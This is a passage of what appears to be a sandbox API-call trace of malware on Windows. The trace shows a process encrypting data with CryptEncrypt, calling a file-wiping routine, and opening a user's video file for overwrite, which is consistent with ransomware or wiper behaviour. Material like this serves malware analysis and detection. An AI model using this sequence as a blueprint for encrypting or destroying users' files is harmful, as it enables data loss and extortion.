[0041.883] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.883] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.883] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.883] CharLowerBuffW (in: lpsz="byte[80993]", cchLength=0xb | out: lpsz="byte[80993]") returned 0xb [0041.883] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.885] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.885] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.885] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.885] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.885] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x95c8d8*, pdwDataLen=0x6ae220*=0x13c5f, dwBufLen=0x13c60 | out: pbData=0x95c8d8*, pdwDataLen=0x6ae220*=0x13c60) returned 1 [0041.885] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.885] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.885] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.886] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.886] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.886] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.886] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.886] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.886] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.886] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.886] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.886] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.886] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.886] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.886] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.886] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.886] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.893] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.894] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.894] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.895] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.895] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.895] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0041.896] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.896] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.896] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0041.896] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.896] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0041.896] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.896] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.896] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.896] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.896] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.896] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0041.896] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0041.896] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.896] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.896] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0041.896] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.896] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.897] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.897] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.897] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.897] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.897] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.897] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.897] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.897] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.897] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.897] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.897] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0041.897] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.897] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.897] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0041.897] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.897] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0041.897] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.897] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0041.897] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.897] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.897] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0041.898] FreeLibrary (hLibModule=0x754b0000) returned 1 [0041.898] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.898] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.898] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.901] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.901] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.901] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.901] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0041.901] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.901] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.901] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lIYPp18.mp4", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aff59b0, ftCreationTime.dwHighDateTime=0x1d5bb64, ftLastAccessTime.dwLowDateTime=0xc55df7e0, ftLastAccessTime.dwHighDateTime=0x1d5c4cc, ftLastWriteTime.dwLowDateTime=0xc55df7e0, ftLastWriteTime.dwHighDateTime=0x1d5c4cc, nFileSizeHigh=0x0, nFileSizeLow=0x13c5f, dwReserved0=0x0, dwReserved1=0x777648, cFileName="lIYPp18.mp4", cAlternateFileName="")) returned 0x7c2100 [0041.901] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0041.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0041.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0041.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0041.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.901] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.902] CharLowerBuffW (in: lpsz="byte[80991]", cchLength=0xb | out: lpsz="byte[80991]") returned 0xb [0041.902] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.902] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0041.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0041.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.902] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.902] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0041.902] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0041.902] FreeLibrary (hLibModule=0x76b40000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.903] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.903] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.903] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.903] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0041.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0041.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0041.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.904] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0041.904] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.905] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lIYPp18.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\liypp18.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0041.906] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0041.906] HeapFree (in: hHeap=0x770000, 